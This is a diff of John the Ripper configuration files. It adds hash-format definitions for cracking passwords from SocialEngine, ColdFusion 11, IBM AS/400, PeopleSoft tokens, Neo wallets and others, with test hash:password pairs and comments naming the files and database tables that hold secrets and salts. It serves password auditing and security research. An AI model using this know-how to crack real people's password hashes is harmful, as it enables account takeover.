+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_userid2
+Func=DynamicFunc__MD5_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_1552$10290925d16d81e50db242c9f3572d91$0000000000000000$$Ulongusername:longpassword@12345678
+Test=$dynamic_1552$53257e018399a241849cb04c70ba8daa$0000000000000000$$Ulongusername:longpassword
+Test=$dynamic_1552$1abe48bac6ad0bf567ab51b094f026a9$86336266301fb552$$Ulongusername:longpassword
+Test=$dynamic_1552$5c414259f7f7a42f8c4d1b6ffb37913a$8c82aec197929775$$Ueight18_characters:123
+
+# SocialEngine hashes (Elijah [W&P])
+#
+# hash = md5('core secret'.'password'.'salt')
+# core.secret -> MySQL 'engine4_core_settings' table, row 'core.secret'
+# salt -> MySQL 'engine4_users' table, 'salt' column
+[List.Generic:dynamic_1560]
+Expression=md5($s.$p.$s2) (SocialEngine)
+Flag=MGF_SALTED
+Flag=MGF_SALTED2
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-46
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_2nd_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_1560$55fce7789372d510023fc819c0ce55a6$a6ebe407fa6e2337cb2deb573d17791e$$21060744:test1
+Test=$dynamic_1560$fd880f2c10f148c409f3c850a52201b0$6cbe843e024f59827c55f3a32d1c3be9$$22262250:thatsworking
+Test=$dynamic_1560$2b199a07acf8e9e36e47ec2a0178933b$2a4c7cf421315f49fae230e80acfa218$$29597016:test3
+Test=$dynamic_1560$13d806a7e87bc1b551478742349882a9$2161869cadcb41f1cc1e939f191c0bb35e58a9a7$$21060744:123123
+
+# ColdFusion 11 hashes (Ivan Novikov <in@wallarm.com>)
+# Hash is password variable from ./lib/password.properties
+# Salt is admin.userid.root.salt variable from ./lib/neo-security.xml
+[List.Generic:dynamic_1588]
+Expression=sha256($s.sha1($p)) (ColdFusion 11)
+Flag=MGF_INPUT_32_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_BASE_16_OUTPUT_UPCASE
+SaltLen=64
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys2
+Func=DynamicFunc__SHA1_crypt_input2_append_input1
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1588$37F816D599BFD69C5A0D750198AB6E46E26CEB120C9AF3B1E5306515058CBAE8$D7B6D57262290BC0A634D2D1A0DFE59F1FBE47885DBC9BB1CEBA8EA9D09D9839:test1234
+
+# IBM AS/400 SHA1 hashes   !NOTE, salt is pre prepared, utf16be(space_pad_10(uc($user_name))
+[List.Generic:dynamic_1590]
+Expression=sha1(utf16be(space_pad_10(uc($s)).$p)) (IBM AS/400 SHA1)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_BASE_16_OUTPUT_UPCASE
+Flag=MGF_UTF8
+SaltLen=20
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__setmode_unicodeBE
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1590$4C106E52CA196986E1C52C7FCD02AF046B76C73C$HEX$0052004F00420020002000200020002000200020:banaan
+Test=$dynamic_1590$CED8050C275A5005D101051FF5BCCADF693E8AB7$HEX$0042004100520054002000200020002000200020:Kulach007
+Test=$dynamic_1590$1BA6C7D54E9696ED33F4DF201E348CA8CA815F75$HEX$005300590053004F005000520020002000200020:T0Psecret!
+Test=$dynamic_1590$A1284B4F1BDD7ED598D4B5060D861D6D614620D3$HEX$00530059005300540045004D0020002000200020:P@ssword01
+Test=$dynamic_1590$94C55BC7EDF1996AC62E8145CDBFA285CA79ED2E$HEX$0051005300590053004400420041002000200020:qsysdba
+Test=$dynamic_1590$CDF4063E283B51EDB7B9A8E6E542042000BD9AE9$HEX$0051005300450043004F00460052002000200020:qsecofr!
+Test=$dynamic_1590$44D43148CFE5CC3372AFD2610BEE3D226B2B50C5$HEX$0054004500530054003100200020002000200020:password1
+Test=$dynamic_1590$349B12D6588843A1632649A501ABC353EBF409E4$HEX$0054004500530054003200200020002000200020:secret
+Test=$dynamic_1590$A97F2F9ED9977A8A628F8727E2851415B06DC540$HEX$0054004500530054003300200020002000200020:test3
+
+# wbb3 SHA1 hashes
+[List.Generic:dynamic_1592]
+Expression=sha1($s.sha1($s.sha1($p))) (wbb3)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1_SHA1
+Flag=MGF_FULL_CLEAN_REQUIRED2
+SaltLen=40
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_input2_from_input
+Func=DynamicFunc__LargeHash_set_offset_40
+Func=DynamicFunc__SHA1_crypt_input2_at_offset_input2
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1592$e2063f7c629d852302d3020599376016ff340399$0b053db07dc02bc6f6e24e00462f17e3c550afa9:123456
+Test=$dynamic_1592$f6975cc560c5d03feb702158d08f90bf2fa773d6$0b053db07dc02bc6f6e24e00462f17e3c550afa9:password
+Test=$dynamic_1592$2c56d23b44eb122bb176dfa2a1452afaf89f1143$a710463f75bf4568d398db32a53f9803007388a3:123456
+Test=$dynamic_1592$2596b5f8e7cdaf4b15604ad336b810e8e2935b1d$1039145e9e785ddb2ac7ccca89ac1b159b595cc1:12345678
+Test=$dynamic_1592$26496a87c1a7dd68f7beceb2fc40b6fc4223a453$db763342e23f8ccdbd9c90d1cc7896d80b7e0a44:12345678
+Test=$dynamic_1592$d945c02cf85738b7db4f4f05edd676283280a513$bf2c7d0c8fb6cb146adf8933e32da012d31b5bbb:123456789
+Test=$dynamic_1592$e3e03fe02223c5030e834f81997f614b43441853$d132b22d3f1d942b99cc1f5fbd5cc3eb0824d608:1234567890
+
+# All credit for this format goes to Alexey Tyurin (ERPScan), François Gaudreault, and Martin Lemay
+# http://gosecure.net/2016/05/04/oracle-peoplesoft-still-a-threat-for-enterprises/ (source)
+# https://erpscan.com/press-center/blog/peoplesoft-security-part-4-peoplesoft-pentest-using-tokenchpoken-tool/
+# https://erpscan.com/wp-content/uploads/tools/ERPScan-tockenchpoken.zip
+[List.Generic:dynamic_1600]
+Expression=sha1($s.utf16le($p)) (Oracle PeopleSoft PS_TOKEN)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_SALTED
+Flag=MGF_UTF8
+SaltLen=-150
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1600$e6155f87b073451076d81e3505f8b9fcd3f53b5a$HEX$710000000403020101000000bc0200000000000010500050005700450042004500580054000645004e0047000e50005300460054005f00480052003432003000310036002d00300034002d00300038002d00310039002e00320037002e00300035002e0030003000300030003000320000:password
+Test=$dynamic_1600$b5e335754127b25ba6f99a94c738e24cd634c35a$HEX$aa07d396f5038a6cbeded88d78d1d6c907e4079b3dc2e12fddee409a51cc05ae73e8cc24d518c923a2f79e49376594503e6238b806bfe33fa8516f4903a9b4:hashcat
+Test=$dynamic_1600$ac869d82e768c1af0e2b80679ddee8efe769d480$HEX$650000000403020101000000bc0200000000000004500053000645004e0047000e50005300460054005f00480052003432003000310035002d00300037002d00300031002d00300038002e00300036002e00340036002e0039003900390035003400330000:password@12345
+
+# https://github.com/neo-project/neo-gui (tested with Neo GUI v2.3.2)
+[List.Generic:dynamic_1608]
+Expression=sha256(sha256_raw(sha256_raw($p))) (Neo Wallet)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_INPUT_32_BYTE
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__LargeHash_OUTMode_raw
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA256_crypt_input1_overwrite_input2
+Func=DynamicFunc__SHA256_crypt_input2_overwrite_input2
+Func=DynamicFunc__SHA256_crypt_input2_to_output1_FINAL
+Test=$dynamic_1608$f2a778f1a6ed3d5bc59a5d79104c598f3f07093f240ca4e91333fb09ed4f36da:abc
+Test=$dynamic_1608$8b12147de49a2832aca47a5bf6fbca12689420ac14c2547ab90f6d495f21f6dc:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEF
+Test=$dynamic_1608$2a1a9918abe22f14d737462301e0c17b125a5f9ba11dc1e872b5320180437d12:openwall
+
+# https://www.oneidentity.com/products/authentication-services/
+# Author: Tim Brown. Borrowed from https://github.com/portcullislabs/linikatz (under BSD 3-Clause "New" or "Revised" License).
+[List.Generic:dynamic_1602]
+Expression=sha256(#.$salt.-.$pass) (QAS vas_auth)
+Flag=MGF_INPUT_32_BYTE
+Flag=MGF_USERNAME
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+CONST1=#
+CONST2=-
+SaltLen=36
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_input1_from_CONST2
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1602$9b4d1328a3dc064704301d2da2975f97b9212d8f08539214b27fd3106dc208ff$C34208EA-8C33-473D-A9B4-53FB40347EA0:P0rtcu11i5!:Administrator@3rd-party.example.org
+
+# this should be last line of the file.  Put other formats before this.  The formats in
+# the following included file are replacement formats for the MD4/5 formats which use
+# 'intermixed' SSE for speed, BUT which can not process longer passwords, due to being
+# limited to a single SSE buffer.  The formats in dynamic_flat_sse_formats.conf are using
+# the large hash 'flat' methods, which allow multiple SSE buffers. They are slower (sometimes
+# a LOT slower), than the intermixed SSE.  But they are much faster than oSSL code, and can
+# take full length passwords (110 bytes).
+
+.include <dynamic_flat_sse_formats.conf>
@@ -0,0 +1,525 @@
+# the set of dynamics was not disabled due to not working, but due to simply
+# being academic formats, and test cases, and not ITW formats
+dynamic_51 = Y
+dynamic_52 = Y
+dynamic_53 = Y
+dynamic_54 = Y
+dynamic_55 = Y
+dynamic_56 = Y
+dynamic_57 = Y
+dynamic_58 = Y
+# dyna-61 used by formspring and should not be disabled.
+dynamic_61 = N
+dynamic_62 = Y
+dynamic_63 = Y
+dynamic_64 = Y
+dynamic_65 = Y
+dynamic_66 = Y
+dynamic_67 = Y
+dynamic_68 = Y
+dynamic_71 = Y
+dynamic_72 = Y
+dynamic_73 = Y
+dynamic_74 = Y
+dynamic_75 = Y
+dynamic_76 = Y
+dynamic_77 = Y
+dynamic_78 = Y
+dynamic_81 = Y
+dynamic_82 = Y
+dynamic_83 = Y
+dynamic_84 = Y
+dynamic_85 = Y
+dynamic_86 = Y
+dynamic_87 = Y
+dynamic_88 = Y
+dynamic_91 = Y
+dynamic_92 = Y
+dynamic_93 = Y
+dynamic_94 = Y
+dynamic_95 = Y
+dynamic_96 = Y
+dynamic_97 = Y
+dynamic_98 = Y
+dynamic_101 = Y
+dynamic_102 = Y
+dynamic_103 = Y
+dynamic_104 = Y
+dynamic_105 = Y
+dynamic_106 = Y
+dynamic_107 = Y
+dynamic_108 = Y
+dynamic_111 = Y
+dynamic_112 = Y
+dynamic_113 = Y
+dynamic_114 = Y
+dynamic_115 = Y
+dynamic_116 = Y
+dynamic_117 = Y
+dynamic_118 = Y
+dynamic_121 = Y
+dynamic_122 = Y
+dynamic_123 = Y
+dynamic_124 = Y
+dynamic_125 = Y
+dynamic_126 = Y
+dynamic_127 = Y
+dynamic_128 = Y
+dynamic_131 = Y
+dynamic_132 = Y
+dynamic_133 = Y
+dynamic_134 = Y
+dynamic_135 = Y
+dynamic_136 = Y
+dynamic_137 = Y
+dynamic_138 = Y
+dynamic_141 = Y
+dynamic_142 = Y
+dynamic_143 = Y
+dynamic_144 = Y
+dynamic_145 = Y
+dynamic_146 = Y
+dynamic_147 = Y
+dynamic_148 = Y
+dynamic_151 = Y
+dynamic_152 = Y
+dynamic_153 = Y
+dynamic_154 = Y
+dynamic_155 = Y
+dynamic_156 = Y
+dynamic_157 = Y
+dynamic_158 = Y
+dynamic_161 = Y
+dynamic_162 = Y
+dynamic_163 = Y
+dynamic_164 = Y
+dynamic_165 = Y
+dynamic_166 = Y
+dynamic_167 = Y
+dynamic_168 = Y
+dynamic_171 = Y
+dynamic_172 = Y
+dynamic_173 = Y
+dynamic_174 = Y
+dynamic_175 = Y
+dynamic_176 = Y
+dynamic_177 = Y
+dynamic_178 = Y
+dynamic_181 = Y
+dynamic_182 = Y
+dynamic_183 = Y
+dynamic_184 = Y
+dynamic_185 = Y
+dynamic_186 = Y
+dynamic_187 = Y
+dynamic_188 = Y
+dynamic_191 = Y
+dynamic_192 = Y
+dynamic_193 = Y
+dynamic_194 = Y
+dynamic_195 = Y
+dynamic_196 = Y
+dynamic_197 = Y
+dynamic_198 = Y
+dynamic_201 = Y
+dynamic_202 = Y
+dynamic_203 = Y
+dynamic_204 = Y
+dynamic_205 = Y
+dynamic_206 = Y
+dynamic_207 = Y
+dynamic_208 = Y
+dynamic_211 = Y
+dynamic_212 = Y
+dynamic_213 = Y
+dynamic_214 = Y
+dynamic_215 = Y
+dynamic_216 = Y
+dynamic_217 = Y
+dynamic_218 = Y
+dynamic_221 = Y
+dynamic_222 = Y
+dynamic_223 = Y
+dynamic_224 = Y
+dynamic_225 = Y
+dynamic_226 = Y
+dynamic_227 = Y
+dynamic_228 = Y
+dynamic_231 = Y
+dynamic_232 = Y
+dynamic_233 = Y
+dynamic_234 = Y
+dynamic_235 = Y
+dynamic_236 = Y
+dynamic_237 = Y
+dynamic_238 = Y
+dynamic_241 = Y
+dynamic_242 = Y
+dynamic_243 = Y
+dynamic_244 = Y
+dynamic_245 = Y
+dynamic_246 = Y
+dynamic_247 = Y
+dynamic_248 = Y
+dynamic_251 = Y
+dynamic_252 = Y
+dynamic_253 = Y
+dynamic_254 = Y
+dynamic_255 = Y
+dynamic_256 = Y
+dynamic_257 = Y
+dynamic_258 = Y
+dynamic_261 = Y
+dynamic_262 = Y
+dynamic_263 = Y
+dynamic_264 = Y
+dynamic_265 = Y
+dynamic_266 = Y
+dynamic_267 = Y
+dynamic_268 = Y
+dynamic_271 = Y
+dynamic_272 = Y
+dynamic_273 = Y
+dynamic_274 = Y
+dynamic_275 = Y
+dynamic_276 = Y
+dynamic_277 = Y
+dynamic_278 = Y
+dynamic_281 = Y
+dynamic_282 = Y
+dynamic_283 = Y
+dynamic_284 = Y
+dynamic_285 = Y
+dynamic_286 = Y
+dynamic_287 = Y
+dynamic_288 = Y
+dynamic_291 = Y
+dynamic_292 = Y
+dynamic_293 = Y
+dynamic_294 = Y
+dynamic_295 = Y
+dynamic_296 = Y
+dynamic_297 = Y
+dynamic_298 = Y
+dynamic_301 = Y
+dynamic_302 = Y
+dynamic_303 = Y
+dynamic_304 = Y
+dynamic_305 = Y
+dynamic_306 = Y
+dynamic_307 = Y
+dynamic_308 = Y
+dynamic_311 = Y
+dynamic_312 = Y
+dynamic_313 = Y
+dynamic_314 = Y
+dynamic_315 = Y
+dynamic_316 = Y
+dynamic_317 = Y
+dynamic_318 = Y
+dynamic_321 = Y
+dynamic_322 = Y
+dynamic_323 = Y
+dynamic_324 = Y
+dynamic_325 = Y
+dynamic_326 = Y
+dynamic_327 = Y
+dynamic_328 = Y
+dynamic_331 = Y
+dynamic_332 = Y
+dynamic_333 = Y
+dynamic_334 = Y
+dynamic_335 = Y
+dynamic_336 = Y
+dynamic_337 = Y
+dynamic_338 = Y
+dynamic_341 = Y
+dynamic_342 = Y
+dynamic_343 = Y
+dynamic_344 = Y
+dynamic_345 = Y
+dynamic_346 = Y
+dynamic_347 = Y
+dynamic_348 = Y
+dynamic_351 = Y
+dynamic_352 = Y
+dynamic_353 = Y
+dynamic_354 = Y
+dynamic_355 = Y
+dynamic_356 = Y
+dynamic_357 = Y
+dynamic_358 = Y
+dynamic_361 = Y
+dynamic_362 = Y
+dynamic_363 = Y
+dynamic_364 = Y
+dynamic_365 = Y
+dynamic_366 = Y
+dynamic_367 = Y
+dynamic_368 = Y
+dynamic_371 = Y
+dynamic_372 = Y
+dynamic_373 = Y
+dynamic_374 = Y
+dynamic_375 = Y
+dynamic_376 = Y
+dynamic_377 = Y
+dynamic_378 = Y
+dynamic_381 = Y
+dynamic_382 = Y
+dynamic_383 = Y
+dynamic_384 = Y
+dynamic_385 = Y
+dynamic_386 = Y
+dynamic_387 = Y
+dynamic_388 = Y
+dynamic_391 = Y
+dynamic_392 = Y
+dynamic_393 = Y
+dynamic_394 = Y
+dynamic_395 = Y
+dynamic_396 = Y
+dynamic_397 = Y
+dynamic_398 = Y
+dynamic_401 = Y
+dynamic_402 = Y
+dynamic_403 = Y
+dynamic_404 = Y
+dynamic_405 = Y
+dynamic_406 = Y
+dynamic_407 = Y
+dynamic_408 = Y
+dynamic_411 = Y
+dynamic_412 = Y
+dynamic_413 = Y
+dynamic_414 = Y
+dynamic_415 = Y
+dynamic_416 = Y
+dynamic_417 = Y
+dynamic_418 = Y
+dynamic_421 = Y
+dynamic_422 = Y
+dynamic_423 = Y
+dynamic_424 = Y
+dynamic_425 = Y
+dynamic_426 = Y
+dynamic_427 = Y
+dynamic_428 = Y
+dynamic_431 = Y
+dynamic_432 = Y
+dynamic_433 = Y
+dynamic_434 = Y
+dynamic_435 = Y
+dynamic_436 = Y
+dynamic_437 = Y
+dynamic_438 = Y
+dynamic_441 = Y
+dynamic_442 = Y
+dynamic_443 = Y
+dynamic_444 = Y
+dynamic_445 = Y
+dynamic_446 = Y
+dynamic_447 = Y
+dynamic_448 = Y
+dynamic_451 = Y
+dynamic_452 = Y
+dynamic_453 = Y
+dynamic_454 = Y
+dynamic_455 = Y
+dynamic_456 = Y
+dynamic_457 = Y
+dynamic_458 = Y
+dynamic_461 = Y
+dynamic_462 = Y
+dynamic_463 = Y
+dynamic_464 = Y
+dynamic_465 = Y
+dynamic_466 = Y
+dynamic_467 = Y
+dynamic_468 = Y
+dynamic_471 = Y
+dynamic_472 = Y
+dynamic_473 = Y
+dynamic_474 = Y
+dynamic_475 = Y
+dynamic_476 = Y
+dynamic_477 = Y
+dynamic_478 = Y
+dynamic_481 = Y
+dynamic_482 = Y
+dynamic_483 = Y
+dynamic_484 = Y
+dynamic_485 = Y
+dynamic_486 = Y
+dynamic_487 = Y
+dynamic_488 = Y
+dynamic_491 = Y
+dynamic_492 = Y
+dynamic_493 = Y
+dynamic_494 = Y
+dynamic_495 = Y
+dynamic_496 = Y
+dynamic_497 = Y
+dynamic_498 = Y
+dynamic_501 = Y
+dynamic_502 = Y
+dynamic_503 = Y
+dynamic_504 = Y
+dynamic_505 = Y
+dynamic_506 = Y
+dynamic_507 = Y
+dynamic_508 = Y
+dynamic_511 = Y
+dynamic_512 = Y
+dynamic_513 = Y
+dynamic_514 = Y
+dynamic_515 = Y
+dynamic_516 = Y
+dynamic_517 = Y
+dynamic_518 = Y
+dynamic_521 = Y
+dynamic_522 = Y
+dynamic_523 = Y
+dynamic_524 = Y
+dynamic_525 = Y
+dynamic_526 = Y
+dynamic_527 = Y
+dynamic_528 = Y
+dynamic_531 = Y
+dynamic_532 = Y
+dynamic_533 = Y
+dynamic_534 = Y
+dynamic_535 = Y
+dynamic_536 = Y
+dynamic_537 = Y
+dynamic_538 = Y
+dynamic_541 = Y
+dynamic_542 = Y
+dynamic_543 = Y
+dynamic_544 = Y
+dynamic_545 = Y
+dynamic_546 = Y
+dynamic_547 = Y
+dynamic_548 = Y
+dynamic_551 = Y
+dynamic_552 = Y
+dynamic_553 = Y
+dynamic_554 = Y
+dynamic_555 = Y
+dynamic_556 = Y
+dynamic_557 = Y
+dynamic_558 = Y
+dynamic_561 = Y
+dynamic_562 = Y
+dynamic_563 = Y
+dynamic_564 = Y
+dynamic_565 = Y
+dynamic_566 = Y
+dynamic_567 = Y
+dynamic_568 = Y
+dynamic_571 = Y
+dynamic_572 = Y
+dynamic_573 = Y
+dynamic_574 = Y
+dynamic_575 = Y
+dynamic_576 = Y
+dynamic_577 = Y
+dynamic_578 = Y
+dynamic_581 = Y
+dynamic_582 = Y
+dynamic_583 = Y
+dynamic_584 = Y
+dynamic_585 = Y
+dynamic_586 = Y
+dynamic_587 = Y
+dynamic_588 = Y
+dynamic_591 = Y
+dynamic_592 = Y
+dynamic_593 = Y
+dynamic_594 = Y
+dynamic_595 = Y
+dynamic_596 = Y
+dynamic_597 = Y
+dynamic_598 = Y
+dynamic_601 = Y
+dynamic_602 = Y
+dynamic_603 = Y
+dynamic_604 = Y
+dynamic_605 = Y
+dynamic_606 = Y
+dynamic_607 = Y
+dynamic_608 = Y
+dynamic_611 = Y
+dynamic_612 = Y
+dynamic_613 = Y
+dynamic_614 = Y
+dynamic_615 = Y
+dynamic_616 = Y
+dynamic_617 = Y
+dynamic_618 = Y
+dynamic_621 = Y
+dynamic_622 = Y
+dynamic_623 = Y
+dynamic_624 = Y
+dynamic_625 = Y
+dynamic_626 = Y
+dynamic_627 = Y
+dynamic_628 = Y
+dynamic_631 = Y
+dynamic_632 = Y
+dynamic_633 = Y
+dynamic_634 = Y
+dynamic_635 = Y
+dynamic_636 = Y
+dynamic_637 = Y
+dynamic_638 = Y
+dynamic_641 = Y
+dynamic_642 = Y
+dynamic_643 = Y
+dynamic_644 = Y
+dynamic_645 = Y
+dynamic_646 = Y
+dynamic_647 = Y
+dynamic_648 = Y
+dynamic_651 = Y
+dynamic_652 = Y
+dynamic_653 = Y
+dynamic_654 = Y
+dynamic_655 = Y
+dynamic_656 = Y
+dynamic_657 = Y
+dynamic_658 = Y
+dynamic_661 = Y
+dynamic_662 = Y
+dynamic_663 = Y
+dynamic_664 = Y
+dynamic_665 = Y
+dynamic_666 = Y
+dynamic_667 = Y
+dynamic_668 = Y
+dynamic_671 = Y
+dynamic_672 = Y
+dynamic_673 = Y
+dynamic_674 = Y
+dynamic_675 = Y
+dynamic_676 = Y
+dynamic_677 = Y
+dynamic_678 = Y
+dynamic_681 = Y
+dynamic_682 = Y
+dynamic_683 = Y
+dynamic_684 = Y
+dynamic_685 = Y
+dynamic_686 = Y
+dynamic_687 = Y
+dynamic_688 = Y
+dynamic_691 = Y
+dynamic_692 = Y
+dynamic_693 = Y
+dynamic_694 = Y
+dynamic_695 = Y
+dynamic_696 = Y
+dynamic_697 = Y
+dynamic_698 = Y
+
+dynamic_1033 = Y
@@ -0,0 +1,212 @@
+# NOTE, same format as dynamic_0  It is slower (50% slower, or more).  But it is not limited to 55 byte passwords.
+# This should work for passwords up to 110 bytes long (max length dynamic will currently allow). It should not be
+# used for shorter passwords (under 55 bytes).  Use dyna_0 for those.
+[List.Generic:dynamic_2000]
+Expression=md5($p) (PW > 55 bytes)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SOURCE
+Flag=MGF_POOR_OMP
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2000$5a105e8b9d40e1329780d62ea2265d8a:test1
+Test=$dynamic_2000$378e2c4a07968da2eca692320136433d:thatsworking
+Test=$dynamic_2000$8ad8757baa8564dc136c1e07507f4a98:test3
+TestD=$dynamic_2000$a4b3933521a38111eb597dd8dbc47614:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2001]
+Expression=md5($p.$s) (joomla) (PW > 23 bytes)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_SALTED
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2001$ed52af63d8ecf0c682442dfef5f36391$1aDNNojYGSc7pSzcdxKxhbqvLtEe4deG:test1
+Test=$dynamic_2001$4fa1e9d54d89bfbe48b4c0f0ca0a3756$laxcaXPjgcdKdKEbkX1SIjHKm0gfYt1c:thatsworking
+Test=$dynamic_2001$82568eeaa1fcf299662ccd59d8a12f54$BdWwFsbGtXPGc0H1TBxCrn0GasyAlJBJ:test3
+TestD=$dynamic_2001$a4d4ce08d9dec5336d2a137cdab28624$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2002]
+Expression=md5(md5($p)) (e107) (PW > 55 bytes)
+Flag=MGF_KEYS_INPUT
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__MD5_crypt_input1_overwrite_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2002$418d89a45edadb8ce4da17e07f72536c:test1
+Test=$dynamic_2002$ccd3c4231a072b5e13856a2059d04fad:thatsworking
+Test=$dynamic_2002$9992295627e7e7162bdf77f14734acf8:test3
+TestD=$dynamic_2002$827b31e7fae2cdb3af70be9560162500:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2003]
+Expression=md5(md5(md5($p))) (PW > 55 bytes)
+Flag=MGF_KEYS_INPUT
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__MD5_crypt_input1_overwrite_input2
+Func=DynamicFunc__MD5_crypt_input2_overwrite_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_2003$964c02612b2a1013ed26d46ba9a73e74:test1
+Test=$dynamic_2003$5d7e6330f69548797c07d97c915690fe:thatsworking
+Test=$dynamic_2003$2e54db8c72b312007f3f228d9d4dd34d:test3
+TestD=$dynamic_2003$35297f9d34baa8e3ca3e5b23155be26f:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2004]
+Expression=md5($s.$p) (OSC) (PW > 31 bytes)
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2004$c02e8eef3eaa1a813c2ff87c1780f9ed$123456:test1
+Test=$dynamic_2004$4a2a1b013da3cda7f7e0625cf3dc3f4c$1234:thatsworking
+Test=$dynamic_2004$3a032e36a9609df6411b8004070431d3$aaaaa:test3
+TestD=$dynamic_2004$d75040e824c1f9e4efd67c19961ddf4d$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2005]
+Expression=md5($s.$p.$s) (PW > 31 bytes)
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-40
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2005$c1003cd39cb5523dd0923a94ab15a3c7$123456:test1
+Test=$dynamic_2005$c1c8618abfc7bdbc4a3c49c2c2c48f82$1234:thatsworking
+Test=$dynamic_2005$e7222e806a8ce5efa6d48acb3aa56dc2$aaaaa:test3
+TestD=$dynamic_2005$ba5528ac65c20213e105bb02e6aaf6a2$1234567890123456789012345678901234567890:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2006]
+Expression=md5(md5($p).$s) (PW > 55 bytes)
+Flag=MGF_SALTED
+Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__set_input_len_32
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_2006$3a9ae23758f05da1fe539e55a096b03b$S111XB:test1
+Test=$dynamic_2006$9694d706d1992abf04344c1e7da1c5d3$T &222:thatsworking
+Test=$dynamic_2006$b7a7f0c374d73fac422bb01f07f5a9d4$lxxxl:test3
+Test=$dynamic_2006$9164fe53be481f811f15efd769aaf0f7$aReallyLongSaltHere:test3
+TestD=$dynamic_2006$7308f7ca156d77564a5dab25d4be0f34$1234567890123456789012345678901234567890123456789012345678901234:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_2008]
+Expression=md5(md5($s).$p) (PW > 23 bytes)
+Flag=MGF_SALTED
+Flag=MGF_SALT_AS_HEX
+Flag=MGF_FLAT_BUFFERS
+SaltLen=-64
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
